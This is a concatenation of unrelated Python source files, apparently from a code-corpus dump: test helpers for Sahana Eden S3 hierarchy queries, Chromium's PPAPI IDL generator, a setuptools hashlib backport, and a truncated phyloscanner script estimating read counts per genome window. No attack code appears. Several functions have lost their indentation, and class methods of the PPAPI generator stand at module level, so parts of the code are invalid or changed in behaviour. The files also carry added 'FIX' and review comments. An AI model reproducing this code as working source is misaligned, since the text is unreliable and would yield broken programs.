                "~.typeof_hierarchy_id$name__typeof": "Type 1-1",
                }
    variable = filter_widget.variable(resource, get_vars)
    values = filter_widget._values(get_vars, variable)
    self.assertEqual(values, [ids])
# -------------------------------------------------------------------------
def inspect_multi_query(self, query, field=None, conjunction=None, op=None):
    """
    Inspect a list:reference multi-value containment query

    @param query: the query
    @param field: the list:reference field
    @param conjunction: the conjunction operator (AND or OR)
    @param op: the containment operator (usually CONTAINS)

    @return: the set of record IDs referenced by the query
    """
    found = set()

    first = query.first
    second = query.second

    assertEqual = self.assertEqual
    inspect_multi_query = self.inspect_multi_query

    if isinstance(first, Query) and isinstance(second, Query):
        # Inner node: sub-queries must be combined by the expected
        # conjunction
        assertEqual(query.op, conjunction)
        # FIX: propagate field into the recursion - otherwise leaf
        # queries below the first nesting level would be checked
        # against None instead of the list:reference field
        found |= inspect_multi_query(first,
                                     field = field,
                                     conjunction = conjunction,
                                     op = op)
        found |= inspect_multi_query(second,
                                     field = field,
                                     conjunction = conjunction,
                                     op = op)
    else:
        # Leaf: a containment query of the list:reference field
        assertEqual(query.first, field)
        assertEqual(query.op, op)
        found.add(int(query.second))

    return found
# -------------------------------------------------------------------------
def equivalent(self, l, r):
"""
Check whether two queries are equivalent
"""
first = l.first
second = l.second
equivalent = self.equivalent
if l.op != r.op:
return False
if isinstance(first, Query):
if isinstance(second, Query):
return equivalent(l.first, r.first) and \
equivalent(l.second, r.second) or \
equivalent(l.second, r.first) and \
equivalent(l.first, r.second)
else:
return equivalent(l.first, r.first)
else:
return l.first == r.first and l.second == r.second
# -------------------------------------------------------------------------
def assertEquivalent(self, query, expected_query):
"""
Shortcut for query equivalence assertion
"""
self.assertTrue(self.equivalent(query, expected_query),
msg = "%s != %s" % (query, expected_query))
# =============================================================================
def run_suite(*test_classes):
    """
    Run the test suite

    @param test_classes: the unittest.TestCase subclasses to load and run
    """
    loader = unittest.TestLoader()
    suite = unittest.TestSuite()
    for test_class in test_classes:
        tests = loader.loadTestsFromTestCase(test_class)
        suite.addTests(tests)
    # FIX: removed dead "if suite is not None" guard - TestSuite() can
    # never be None here
    unittest.TextTestRunner(verbosity=2).run(suite)
    return
# Run all hierarchy test suites when executed as a standalone script
if __name__ == "__main__":

    run_suite(
        S3HierarchyTests,
        S3LinkedHierarchyTests,
        S3TypeOfTests,
    )
# END ========================================================================
| mit |
chromium2014/src | tools/json_schema_compiler/ppapi_generator.py | 37 | 10976 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import datetime
import os.path
import sys
import code
import cpp_util
import model
try:
import jinja2
except ImportError:
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..',
'third_party'))
import jinja2
class _PpapiGeneratorBase(object):
  """A base class for ppapi generators.

  Implementations should set TEMPLATE_NAME to a string containing the name of
  the template file without its extension. The template will be rendered with
  the following symbols available:
    name: A string containing the name of the namespace.
    enums: A list of enums within the namespace.
    types: A list of types within the namespace, sorted such that no element
        depends on an earlier element.
    events: A dict of events within the namespace.
    functions: A dict of functions within the namespace.
    year: An int containing the current year.
    source_file: The name of the input file.
  """

  def __init__(self, namespace):
    self._namespace = namespace
    # Name-components tuple -> model.Type, for every type reachable from
    # the namespace's functions/events (filled by _ResolveTypeDependencies)
    self._required_types = {}
    # Name-components tuples of types that are used as arrays, optionals,
    # or optional arrays (determines which wrapper structs are needed)
    self._array_types = set()
    self._optional_types = set()
    self._optional_array_types = set()
    # Name-components tuple -> set of name-components it depends on;
    # ordered for deterministic output
    self._dependencies = collections.OrderedDict()
    # Topologically sorted struct types and enum types (outputs of
    # _ResolveTypeDependencies)
    self._types = []
    self._enums = []
    self.jinja_environment = jinja2.Environment(
        loader=jinja2.FileSystemLoader(os.path.join(os.path.dirname(__file__),
                                                    'templates', 'ppapi')))
    self._SetupFilters()
    self._ResolveTypeDependencies()
def _SetupFilters(self):
    """Registers the custom Jinja2 filters used by the ppapi templates."""
    # NOTE(review): EnumValueName, GetFunctionReturnType, FormatParamType,
    # NeedsOptional, NeedsArray, NeedsOptionalArray and HasArrayOuts are
    # not defined in this base class's visible code - presumably provided
    # by subclasses or later in this class; confirm before refactoring.
    self.jinja_environment.filters.update({
        'ppapi_type': self.ToPpapiType,
        'classname': cpp_util.Classname,
        'enum_value': self.EnumValueName,
        'return_type': self.GetFunctionReturnType,
        'format_param_type': self.FormatParamType,
        'needs_optional': self.NeedsOptional,
        'needs_array': self.NeedsArray,
        'needs_optional_array': self.NeedsOptionalArray,
        'has_array_outs': self.HasArrayOuts,
    })
def Render(self, template_name, values):
    """Renders '<template_name>.template' with |values|, wrapped in a
    code.Code object."""
    output = code.Code()
    template = self.jinja_environment.get_template(
        '%s.template' % template_name)
    output.Append(template.render(values))
    return output
def Generate(self):
    """Generates a Code object for a single namespace."""
    # enums/types were pre-sorted by _ResolveTypeDependencies so the
    # template can emit declarations in dependency order
    return self.Render(self.TEMPLATE_NAME, {
        'name': self._namespace.name,
        'enums': self._enums,
        'types': self._types,
        'events': self._namespace.events,
        'functions': self._namespace.functions,
        # TODO(sammc): Don't change years when regenerating existing output files.
        'year': datetime.date.today().year,
        'source_file': self._namespace.source_file,
    })
def _ResolveTypeDependencies(self):
    """Calculates the transitive closure of the types in _required_types.

    Returns a tuple containing the list of struct types and the list of enum
    types. The list of struct types is ordered such that no type depends on a
    type later in the list.
    """
    # Seed _required_types from all function and event signatures
    if self._namespace.functions:
        for function in self._namespace.functions.itervalues():
            self._FindFunctionDependencies(function)

    if self._namespace.events:
        for event in self._namespace.events.itervalues():
            self._FindFunctionDependencies(event)

    # Fixpoint iteration: registering a type's members may add new
    # required types, so loop until everything has been resolved
    resolved_types = set()
    while resolved_types < set(self._required_types):
        for typename in sorted(set(self._required_types) - resolved_types):
            type_ = self._required_types[typename]
            self._dependencies.setdefault(typename, set())
            for member in type_.properties.itervalues():
                self._RegisterDependency(member, self._NameComponents(type_))
            resolved_types.add(typename)

    # Topological sort: repeatedly emit a type with no outstanding
    # dependencies into _enums/_types, then remove it from all other
    # dependency sets. NOTE: Python 2 dict.items() returns a snapshot
    # list, so deleting inside the loop is safe; the loop also breaks
    # right after each deletion.
    while self._dependencies:
        for name, deps in self._dependencies.items():
            if not deps:
                if (self._required_types[name].property_type ==
                    model.PropertyType.ENUM):
                    self._enums.append(self._required_types[name])
                else:
                    self._types.append(self._required_types[name])
                for deps in self._dependencies.itervalues():
                    deps.discard(name)
                del self._dependencies[name]
                break
        else:
            # No emittable type found => dependency cycle
            raise ValueError('Circular dependency %s' % self._dependencies)
def _FindFunctionDependencies(self, function):
    """Registers the types required by |function|'s parameters, callback
    parameters, and return value."""
    register = self._RegisterDependency
    for param in function.params:
        register(param, None)
    callback = function.callback
    if callback:
        for param in callback.params:
            register(param, None)
    returns = function.returns
    if returns:
        # Return values are registered as neither optional nor array
        self._RegisterTypeDependency(returns, None, False, False)
def _RegisterDependency(self, member, depender):
    """Registers |depender|'s dependency on |member|'s type; optionality
    comes from the property, array-ness is derived from the type itself."""
    self._RegisterTypeDependency(member.type_, depender, member.optional, False)
def _RegisterTypeDependency(self, type_, depender, optional, array):
    """Records that |depender| (a name-components tuple, or None) requires
    |type_|, tracking whether it is used as array and/or optional so the
    matching wrapper types can be generated later."""
    if type_.property_type == model.PropertyType.ARRAY:
        # An array depends on its element type
        self._RegisterTypeDependency(type_.item_type, depender, optional, True)
    elif type_.property_type == model.PropertyType.REF:
        # Resolve the $ref to the concrete type in this namespace
        self._RegisterTypeDependency(self._namespace.types[type_.ref_type],
                                     depender, optional, array)
    elif type_.property_type in (model.PropertyType.OBJECT,
                                 model.PropertyType.ENUM):
        # Only objects and enums produce generated declarations
        name_components = self._NameComponents(type_)
        self._required_types[name_components] = type_
        if depender:
            self._dependencies.setdefault(depender, set()).add(
                name_components)
        if array:
            self._array_types.add(name_components)
            if optional:
                self._optional_array_types.add(name_components)
        elif optional:
            self._optional_types.add(name_components)
@staticmethod
def _NameComponents(entity):
    """Returns a tuple of the fully-qualified name of an entity."""
    # Walk up the parent chain, collecting names; array types are
    # anonymous wrappers and contribute no name component
    collected = []
    node = entity
    while node:
        is_array = (isinstance(node, model.Type) and
                    node.property_type == model.PropertyType.ARRAY)
        if not is_array:
            collected.append(node.name)
        node = node.parent
    # Drop the outermost (root) component and restore outer-to-inner order
    return tuple(reversed(collected[:-1]))
def ToPpapiType(self, type_, array=False, optional=False):
  """Returns a string containing the name of the Pepper C type for |type_|.

  If array is True, returns the name of an array of |type_|. If optional is
  True, returns the name of an optional |type_|. If both array and optional
  are True, returns the name of an optional array of |type_|.
  """
  if isinstance(type_, model.Function) or type_.property_type in (
      model.PropertyType.OBJECT, model.PropertyType.ENUM):
    # Generated compound types get a namespaced PP_... struct/enum name.
    return self._FormatPpapiTypeName(
        array, optional, '_'.join(
            cpp_util.Classname(s) for s in self._NameComponents(type_)),
        namespace=cpp_util.Classname(self._namespace.name))
  elif type_.property_type == model.PropertyType.REF:
    # Follow the reference and name the referenced type instead.
    return self.ToPpapiType(self._namespace.types[type_.ref_type],
                            optional=optional, array=array)
  elif type_.property_type == model.PropertyType.ARRAY:
    return self.ToPpapiType(type_.item_type, array=True,
                            optional=optional)
  elif type_.property_type == model.PropertyType.STRING and not array:
    return 'PP_Var'
  elif array or optional:
    if type_.property_type in self._PPAPI_COMPOUND_PRIMITIVE_TYPE_MAP:
      return self._FormatPpapiTypeName(
          array, optional,
          self._PPAPI_COMPOUND_PRIMITIVE_TYPE_MAP[type_.property_type], '')
  # Plain primitives map directly; anything unrecognised falls back to PP_Var.
  return self._PPAPI_PRIMITIVE_TYPE_MAP.get(type_.property_type, 'PP_Var')
# Primitive schema types that map directly onto a C scalar type name.
_PPAPI_PRIMITIVE_TYPE_MAP = {
    model.PropertyType.BOOLEAN: 'PP_Bool',
    model.PropertyType.DOUBLE: 'double_t',
    model.PropertyType.INT64: 'int64_t',
    model.PropertyType.INTEGER: 'int32_t',
}
# Name fragments used when a primitive needs a generated optional and/or
# array wrapper type (assembled by _FormatPpapiTypeName).
_PPAPI_COMPOUND_PRIMITIVE_TYPE_MAP = {
    model.PropertyType.BOOLEAN: 'Bool',
    model.PropertyType.DOUBLE: 'Double',
    model.PropertyType.INT64: 'Int64',
    model.PropertyType.INTEGER: 'Int32',
    model.PropertyType.STRING: 'String',
}
@staticmethod
def _FormatPpapiTypeName(array, optional, name, namespace=''):
if namespace:
namespace = '%s_' % namespace
if array:
if optional:
return 'PP_%sOptional_%s_Array' % (namespace, name)
return 'PP_%s%s_Array' % (namespace, name)
if optional:
return 'PP_%sOptional_%s' % (namespace, name)
return 'PP_%s%s' % (namespace, name)
# --- Queries used by the output templates to decide which derived
# --- (optional / array) typedefs must be emitted.

def NeedsOptional(self, type_):
  """Returns True if an optional |type_| is required."""
  return self._NameComponents(type_) in self._optional_types

def NeedsArray(self, type_):
  """Returns True if an array of |type_| is required."""
  return self._NameComponents(type_) in self._array_types

def NeedsOptionalArray(self, type_):
  """Returns True if an optional array of |type_| is required."""
  return self._NameComponents(type_) in self._optional_array_types

def FormatParamType(self, param):
  """Formats the type of a parameter or property."""
  return self.ToPpapiType(param.type_, optional=param.optional)
@staticmethod
def GetFunctionReturnType(function):
return 'int32_t' if function.callback or function.returns else 'void'
def EnumValueName(self, enum_value, enum_type):
  """Returns a string containing the name for an enum value."""
  # Convention: <UPPERCASED_ENUM_TYPE_NAME>_<UPPERCASED_VALUE_NAME>.
  return '%s_%s' % (self.ToPpapiType(enum_type).upper(),
                    enum_value.name.upper())
def _ResolveType(self, type_):
  """Strips REF indirections and ARRAY wrappers down to the base type."""
  resolved = type_
  while True:
    if resolved.property_type == model.PropertyType.REF:
      resolved = self._namespace.types[resolved.ref_type]
    elif resolved.property_type == model.PropertyType.ARRAY:
      resolved = resolved.item_type
    else:
      return resolved
def _IsOrContainsArray(self, type_):
  """Returns True if |type_| is an array, or resolves to an object any of
  whose properties (transitively) is or contains an array."""
  if type_.property_type == model.PropertyType.ARRAY:
    return True
  type_ = self._ResolveType(type_)
  if type_.property_type == model.PropertyType.OBJECT:
    # NOTE: itervalues() makes this Python 2 only, consistent with the
    # rest of this file.
    return any(self._IsOrContainsArray(param.type_)
               for param in type_.properties.itervalues())
  return False
def HasArrayOuts(self, function):
  """Returns True if the function produces any arrays as outputs.

  This includes arrays that are properties of other objects.
  """
  callback_params = function.callback.params if function.callback else []
  if any(self._IsOrContainsArray(p.type_) for p in callback_params):
    return True
  # Preserve the original short-circuit: a falsy |returns| is returned as-is.
  return function.returns and self._IsOrContainsArray(function.returns)
class _IdlGenerator(_PpapiGeneratorBase):
  # Selects the .idl output template; all generation logic lives in the
  # base class.
  TEMPLATE_NAME = 'idl'
class _GeneratorWrapper(object):
def __init__(self, generator_factory):
self._generator_factory = generator_factory
def Generate(self, namespace):
return self._generator_factory(namespace).Generate()
class PpapiGenerator(object):
  """Entry point exposing the .idl generator, built by wrapping
  _IdlGenerator in a _GeneratorWrapper."""

  def __init__(self):
    self.idl_generator = _GeneratorWrapper(_IdlGenerator)
| bsd-3-clause |
openhealthcare/openspirometer | lib/python2.7/site-packages/setuptools/_backport/hashlib/__init__.py | 77 | 5011 | # $Id$
#
# Copyright (C) 2005 Gregory P. Smith (greg@krypto.org)
# Licensed to PSF under a Contributor Agreement.
#
__doc__ = """hashlib module - A common interface to many hash functions.
new(name, string='') - returns a new hash object implementing the
given hash function; initializing the hash
using the given string data.
Named constructor functions are also available, these are much faster
than using new():
md5(), sha1(), sha224(), sha256(), sha384(), and sha512()
More algorithms may be available on your platform but the above are
guaranteed to exist.
NOTE: If you want the adler32 or crc32 hash functions they are available in
the zlib module.
Choose your hash function wisely. Some have known collision weaknesses.
sha384 and sha512 will be slow on 32 bit platforms.
Hash objects have these methods:
- update(arg): Update the hash object with the string arg. Repeated calls
are equivalent to a single call with the concatenation of all
the arguments.
- digest(): Return the digest of the strings passed to the update() method
so far. This may contain non-ASCII characters, including
NUL bytes.
- hexdigest(): Like digest() except the digest is returned as a string of
double length, containing only hexadecimal digits.
- copy(): Return a copy (clone) of the hash object. This can be used to
efficiently compute the digests of strings that share a common
initial substring.
For example, to obtain the digest of the string 'Nobody inspects the
spammish repetition':
>>> import hashlib
>>> m = hashlib.md5()
>>> m.update("Nobody inspects")
>>> m.update(" the spammish repetition")
>>> m.digest()
'\\xbbd\\x9c\\x83\\xdd\\x1e\\xa5\\xc9\\xd9\\xde\\xc9\\xa1\\x8d\\xf0\\xff\\xe9'
More condensed:
>>> hashlib.sha224("Nobody inspects the spammish repetition").hexdigest()
'a4337bc45a8fc544c03f52dc550cd6e1e87021bc896588bd79e901e2'
"""
# This tuple and __get_builtin_constructor() must be modified if a new
# always available algorithm is added.
__always_supported = ('md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512')

# Public alias kept for compatibility with the real hashlib module.
algorithms = __always_supported

__all__ = __always_supported + ('new', 'algorithms')
def __get_builtin_constructor(name):
    """Returns the builtin (non-OpenSSL) constructor for the named hash,
    importing the Python 2 extension modules (_sha, md5, _sha256,
    _sha512) on demand; raises ValueError if the hash is unsupported."""
    try:
        if name in ('SHA1', 'sha1'):
            import _sha
            return _sha.new
        elif name in ('MD5', 'md5'):
            import md5
            return md5.new
        elif name in ('SHA256', 'sha256', 'SHA224', 'sha224'):
            import _sha256
            bs = name[3:]  # digest-size suffix, e.g. '256' or '224'
            if bs == '256':
                return _sha256.sha256
            elif bs == '224':
                return _sha256.sha224
        elif name in ('SHA512', 'sha512', 'SHA384', 'sha384'):
            import _sha512
            bs = name[3:]
            if bs == '512':
                return _sha512.sha512
            elif bs == '384':
                return _sha512.sha384
    except ImportError:
        pass  # no extension module, this hash is unsupported.
    raise ValueError('unsupported hash type %s' % name)
def __get_openssl_constructor(name):
    """Prefers the OpenSSL-backed constructor for |name|, falling back to
    the builtin implementation when OpenSSL cannot provide it."""
    try:
        f = getattr(_hashlib, 'openssl_' + name)
        # Allow the C module to raise ValueError. The function will be
        # defined but the hash not actually available thanks to OpenSSL.
        f()
        # Use the C function directly (very fast)
        return f
    except (AttributeError, ValueError):
        return __get_builtin_constructor(name)
def __py_new(name, string=''):
    """new(name, string='') - Return a new hashing object using the named algorithm;
    optionally initialized with a string.
    """
    # Fallback used when the _hashlib (OpenSSL) C module is unavailable.
    return __get_builtin_constructor(name)(string)
def __hash_new(name, string=''):
    """new(name, string='') - Return a new hashing object using the named algorithm;
    optionally initialized with a string.
    """
    try:
        return _hashlib.new(name, string)
    except ValueError:
        # If the _hashlib module (OpenSSL) doesn't support the named
        # hash, try using our builtin implementations.
        # This allows for SHA224/256 and SHA384/512 support even though
        # the OpenSSL library prior to 0.9.8 doesn't provide them.
        return __get_builtin_constructor(name)(string)
# Module initialisation: bind 'new' and one module-level constructor per
# always-supported algorithm, preferring OpenSSL when _hashlib imports.
try:
    import _hashlib
    new = __hash_new
    __get_hash = __get_openssl_constructor
except ImportError:
    new = __py_new
    __get_hash = __get_builtin_constructor

for __func_name in __always_supported:
    # try them all, some may not work due to the OpenSSL
    # version not supporting that algorithm.
    try:
        globals()[__func_name] = __get_hash(__func_name)
    except ValueError:
        import logging
        logging.exception('code for hash %s was not found.', __func_name)

# Cleanup locals()
del __always_supported, __func_name, __get_hash
del __py_new, __hash_new, __get_openssl_constructor
| agpl-3.0 |
BDI-pathogens/phyloscanner | tools/EstimateReadCountPerWindow.py | 1 | 14576 | #!/usr/bin/env python
from __future__ import print_function
## Author: Chris Wymant, c.wymant@imperial.ac.uk
## Acknowledgement: I wrote this while funded by ERC Advanced Grant PBDR-339251
##
## Overview:
ExplanatoryMessage = '''For each bam file in the list given as input, this
script does the following. The distribution of read lengths, and insert sizes if
reads are found to be paired, is calculated. (Here, length means length of the
mapping reference covered by the read, which will not be the same as the true
read length if there are insertions or deletions.) We then estimate the number
of reads and inserts expected to fully span a window of width W by assuming that
reads are distributed randomly over the genome (i.e. ignoring the actual
location information in the bam). We output this count for each bam file as a
function of W.'''
import os
import sys
import argparse
import pysam
import phyloscanner_funcs as pf
import collections
import numpy as np
# Define a function to check files exist, as a type for the argparse.
# Define a function to check files exist, as a type for the argparse.
def File(MyFile):
  """argparse 'type' callable: returns the path if it is an existing
  file, otherwise raises ArgumentTypeError."""
  if os.path.isfile(MyFile):
    return MyFile
  raise argparse.ArgumentTypeError(MyFile+' does not exist or is not a file.')
# A class to have new lines in argument help text
class SmartFormatter(argparse.HelpFormatter):
  """Help formatter preserving explicit line breaks in 'R|'-prefixed text."""

  def _split_lines(self, text, width):
    if not text.startswith('R|'):
      # Fall back to the default wrapping behaviour.
      return argparse.HelpFormatter._split_lines(self, text, width)
    return text[2:].splitlines()
# Set up the arguments for this script
parser = argparse.ArgumentParser(description=ExplanatoryMessage,
                                 formatter_class=SmartFormatter)

# Positional args
parser.add_argument('BamAndRefList', type=File,
help='''R|A csv-format file listing the bam and reference files
(i.e. the fasta-format file containing the sequence to
which the reads were mapped). The first column should
be the bam file, the second column the corresponding
reference file, with a comma separating the two. An
optional third column, if present, will be used to
rename the bam files in all output. For example:
PatientA.bam,PatientA_ref.fasta,A
PatientB.bam,PatientB_ref.fasta,B''')

# Optional args
parser.add_argument('-N', '--normalise', action='store_true', help='''Normalise
the counts for each bam to the value at a window width of zero, making it easier
to compare the relative decline in number of reads with growing window size
between different bams with different total numbers of reads.''')
parser.add_argument('-O', '--out-filename', help="We'll append '.csv' for the "
    "output data file, and '.pdf' for the plot. The default is "
    "'EstimatedReadCountsPerWindow'.", default='EstimatedReadCountsPerWindow')
parser.add_argument('-OIS', '--overlapping-insert-sizes', action='store_true',
help='''Just record the insert size distribution for each bam, restricted to
inserts where the mates overlap.''')
parser.add_argument('-DB', '--dont-plot', action='store_true',
    help="Don't plot the results.")
parser.add_argument('-MC', '--min-read-count', type=float, help='''Used to
specify a positive number: we'll truncate the x axis when the window width
becomes so large that all bams have a read count per window below this
value. The default is 1.''', default=1)
parser.add_argument('-AS', '--axis-font-size', type=int,
    help='For the plot. The default is 15.', default=15)
parser.add_argument('-TS', '--title-font-size', type=int,
    help='For the plot. The default is 15.', default=15)
parser.add_argument('-LS', '--legend-font-size', type=int,
    help='For the plot. The default is 7.', default=7)
parser.add_argument('-LL', '--legend-location',
help='''For the plot. The default is 'lower left'. The other options are:
'best', 'upper right', 'upper left', 'lower right', 'right', 'center left',
'center right', 'lower center',' upper center', 'center' ''',
    default='lower left')
parser.add_argument('-LY', '--linear-y-axis',
    help='For the plot. The default is logarithmic.', action='store_true')
parser.add_argument('-XM', '--x-min-max', help='The minimum and maximum for '\
    'the x axis in the plot, specified together as a comma-separated pair of '\
    'numbers.')
parser.add_argument('-YM', '--y-min-max', help='The minimum and maximum for '\
    'the y axis in the plot, specified together as a comma-separated pair of '\
    'numbers.')
parser.add_argument('--x-samtools', default='samtools', help=\
    'Used to specify the command required to run samtools, if it is needed to index'
    ' the bam files (by default: samtools).')
args = parser.parse_args()

# Shorthand for the --overlapping-insert-sizes mode flag.
InsertSizesOnly = args.overlapping_insert_sizes
def GetIntPair(arg, ArgName):
  """Parses 'a,b' into a sorted (min, max) pair of floats.

  On malformed input, prints an error naming |ArgName| and exits.
  (Despite the name, values are parsed as floats, matching the original.)
  """
  pieces = arg.split(',')
  try:
    if len(pieces) != 2:
      raise ValueError
    first = float(pieces[0])
    second = float(pieces[1])
  except ValueError:
    print(ArgName, 'should be used to specify a comma-separated pair of',
    'numbers. Quitting.', file=sys.stderr)
    exit(1)
  return min(first, second), max(first, second)
# Get plot limits
if args.x_min_max:
  Xmin, Xmax = GetIntPair(args.x_min_max, '--x-min-max')
if args.y_min_max:
  Ymin, Ymax = GetIntPair(args.y_min_max, '--y-min-max')

# Read in the input bam and ref files
BamFiles, RefFiles, aliases, BamFileBasenames = \
    pf.ReadInputCSVfile(args.BamAndRefList)
NumBams = len(BamFiles)

# Make index files for the bam files if needed.
pf.MakeBamIndices(BamFiles, args.x_samtools)
def FindReadCountAsFuncOfWindowWidth(ReadSizeCountDict, RefLength):
  """Converts a {read length: count} histogram into the expected number of
  reads fully spanning a window, as a function of window width.

  Element W-1 of the returned array is the expected count for width W,
  assuming reads are placed uniformly at random along a reference of
  length RefLength. With --normalise the counts are divided by the
  width-1 value (and a plain list is returned instead of a numpy array).
  """
  # Return an empty array if there are no reads
  if len(ReadSizeCountDict) == 0:
    return np.zeros(0)
  LargestReadLength = max(ReadSizeCountDict.keys())
  RefLengthPlus1 = RefLength + 1
  # The nth element of this list will eventually contain the number of reads
  # expected to span a window of width n+1 (list is zero-based).
  ReadsCountByWindowWidth = np.zeros(LargestReadLength)
  for ReadLength, count in ReadSizeCountDict.items():
    ReadLengthPlus1 = ReadLength + 1
    # The number of positions at which we could place a window of width W is
    # RefLength - W + 1
    # The number of positions at which we could place a window of width W such
    # that it is wholly inside a read is ReadLength - W + 1
    # Probability of a given read overlapping a window of width W is therefore
    # (ReadLength - W + 1) / (RefLength - W + 1)
    for W in range(1, ReadLengthPlus1):
      NumSpanningReads = count * \
          float(ReadLengthPlus1 - W) / (RefLengthPlus1 - W)
      ReadsCountByWindowWidth[W-1] += NumSpanningReads
  if args.normalise:
    ReadsCountByWindowWidth = [float(count) / ReadsCountByWindowWidth[0] \
        for count in ReadsCountByWindowWidth]
  return ReadsCountByWindowWidth
# For each bam: tally the distribution of read lengths and (for paired
# data) insert sizes, then convert each distribution into the expected
# number of spanning reads per window width.
ReadLengthCountsByBam = collections.OrderedDict()
InsertSizeCountsByBam = collections.OrderedDict()
InsertSizesOnlyByBam = collections.OrderedDict()

for i, BamFileName in enumerate(BamFiles):
  alias = aliases[i]
  print('Now counting read and insert sizes for', alias)
  bam = pysam.AlignmentFile(BamFileName, "rb")

  # Find the reference in the bam file; there should only be one.
  AllRefs = bam.references
  if len(AllRefs) != 1:
    print('Expected exactly one reference in', BamFileName + '; found',\
        str(len(AllRefs)) + '.Quitting.', file=sys.stderr)
    exit(1)
  RefName = AllRefs[0]

  # Get the length of the reference.
  AllRefLengths = bam.lengths
  if len(AllRefLengths) != 1:
    print('Pysam error: found one reference but', len(AllRefLengths),
        'reference lengths. Quitting.', file=sys.stderr)
    exit(1)
  RefLength = AllRefLengths[0]

  PairedReadCoords = {}
  ReadLengthCounts = {}
  InsertSizeCounts = {}
  TotalReadCount = 0

  # Iterate through the reads
  for read in bam.fetch(RefName):
    MappedPositions = read.get_reference_positions(full_length=False)
    # Skip unmapped reads
    if not MappedPositions:
      continue
    TotalReadCount += 1
    # Length here = span of the mapping reference covered by the read.
    start = min(MappedPositions[0], MappedPositions[-1])
    end = max(MappedPositions[0], MappedPositions[-1])
    ReadLength = end - start
    try:
      ReadLengthCounts[ReadLength] += 1
    except KeyError:
      ReadLengthCounts[ReadLength] = 1
    # The first time we encounter a mate from a pair, record its start and end.
    # When we encounter its mate, if they overlap, record the insert size; if
    # they don't overlap, record their separate lengths as though they are two
    # different inserts (because phyloscanner won't merge them - they are
    # effectively two separate inserts from the point of view of merging).
    if read.is_paired:
      if read.query_name in PairedReadCoords:
        MateStart, MateEnd, MateFoundBool = PairedReadCoords[read.query_name]
        PairedReadCoords[read.query_name][2] = True
        if start <= MateStart <= end:
          InsertSize = max(end, MateEnd) - start
          try:
            InsertSizeCounts[InsertSize] += 1
          except KeyError:
            InsertSizeCounts[InsertSize] = 1
        elif MateStart <= start <= MateEnd:
          InsertSize = max(end, MateEnd) - MateStart
          try:
            InsertSizeCounts[InsertSize] += 1
          except KeyError:
            InsertSizeCounts[InsertSize] = 1
        else:
          # Non-overlapping mates: count each read separately.
          try:
            InsertSizeCounts[ReadLength] += 1
          except KeyError:
            InsertSizeCounts[ReadLength] = 1
          MateLength = MateEnd - MateStart
          try:
            InsertSizeCounts[MateLength] += 1
          except KeyError:
            InsertSizeCounts[MateLength] = 1
      else:
        PairedReadCoords[read.query_name] = [start, end, False]

  # For paired reads for which we didn't find a mate, add just the read length
  # to the insert size distribution.
  NumMissingMates = 0
  for start, end, MateFound in PairedReadCoords.values():
    if not MateFound:
      NumMissingMates += 1
      ReadLength = end - start
      try:
        InsertSizeCounts[ReadLength] += 1
      except KeyError:
        InsertSizeCounts[ReadLength] = 1
  if NumMissingMates > 0:
    print('Info:', NumMissingMates, 'of', TotalReadCount, 'reads in',
        BamFileName, "are flagged as being paired but don't have a mate present.")

  # Skip empty bams
  if TotalReadCount == 0:
    print('Warning: no reads found in', BamFileName + '. Skipping.')
    continue
  if InsertSizesOnly:
    InsertSizesOnlyByBam[alias] = InsertSizeCounts
  ReadLengthCountsByBam[alias] = \
      FindReadCountAsFuncOfWindowWidth(ReadLengthCounts, RefLength)
  InsertSizeCountsByBam[alias] = \
      FindReadCountAsFuncOfWindowWidth(InsertSizeCounts, RefLength)
# With --overlapping-insert-sizes, just write the raw size distribution
# per bam and stop.
if InsertSizesOnly:
  with open(args.out_filename + '.csv', 'w') as f:
    f.write('Bam file,Size of overlapping read pair or length of read in ' + \
        'non-overlapping pair,Count\n')
    # NOTE(review): the loop variable shadows the InsertSizesOnly flag;
    # harmless here since we exit immediately afterwards.
    for alias, InsertSizesOnly in InsertSizesOnlyByBam.items():
      for size, count in sorted(InsertSizesOnly.items(), key=lambda x:x[0]):
        f.write(alias + ',' + str(size) + ',' + str(count) + '\n')
  exit(0)
# Make a matrix for which the first column is every window size we need to
# consider, in order, and subsequent columns list the number of reads (and
# inserts, if reads are paired) expected to fully span a window of that size,
# for each different bam.
MaxInsertSize = max(len(list_) for list_ in InsertSizeCountsByBam.values())
SomeDataIsPaired = MaxInsertSize > 0
MaxReadOrInsertSize = max(MaxInsertSize,
    max(len(list_) for list_ in ReadLengthCountsByBam.values()))
if SomeDataIsPaired:
  # Two columns per bam: read counts and insert-size counts.
  matrix = np.zeros((MaxReadOrInsertSize, 2 * NumBams + 1))
else:
  matrix = np.zeros((MaxReadOrInsertSize, NumBams + 1))
matrix[:, 0] = np.arange(1, MaxReadOrInsertSize + 1)
header = 'window width'
if SomeDataIsPaired:
  for alias in aliases:
    header += ',' + 'read count in ' + alias + ',insert size count in ' + alias
  for i, ReadLengthCounts in enumerate(ReadLengthCountsByBam.values()):
    matrix[:len(ReadLengthCounts), 2 * i + 1] = ReadLengthCounts
  for i, InsertSizeCounts in enumerate(InsertSizeCountsByBam.values()):
    matrix[:len(InsertSizeCounts), 2 * i + 2] = InsertSizeCounts
else:
  for alias in aliases:
    header += ',' + 'read count in ' + alias
  for i, ReadLengthCounts in enumerate(ReadLengthCountsByBam.values()):
    matrix[:len(ReadLengthCounts), i + 1] = ReadLengthCounts

# Write the matrix to a csv file.
with open(args.out_filename + '.csv', 'w') as f:
  np.savetxt(f, matrix, delimiter=',', header=header, fmt='%.1f')
# The csv has been written; stop here if plotting was not requested or
# matplotlib is unavailable.
if args.dont_plot:
  exit(0)
try:
  import matplotlib.pyplot as plt
except ImportError:
  print("The python library matplotlib does not seem to be installed: you'll "
      "need to plot", args.out_filename + '.csv yourself.' )
  exit(1)
# For plotting: cut off the tail end of the matrix where read counts are too
# small.
LastDesiredRow = 0
# Scan from the largest window width downwards for the last row where any
# bam still reaches --min-read-count.
for row in range(MaxReadOrInsertSize - 1, -1, -1):
  if max(matrix[row, 1:]) >= args.min_read_count:
    LastDesiredRow = row
    break
if LastDesiredRow == 0:
  print('Warning: no bam has', args.min_read_count, 'reads per window',
      'regardless how small the window is. Ignoring the --min-read-count value.')
  LastDesiredRow = MaxReadOrInsertSize - 1
matrix = matrix[:LastDesiredRow + 1, :]
# Plot one line per column: reads per bam, plus read pairs per bam when
# the data are paired.
ax = plt.figure().add_subplot(111)
if args.x_min_max:
  ax.set_xlim(xmin=Xmin, xmax=Xmax)
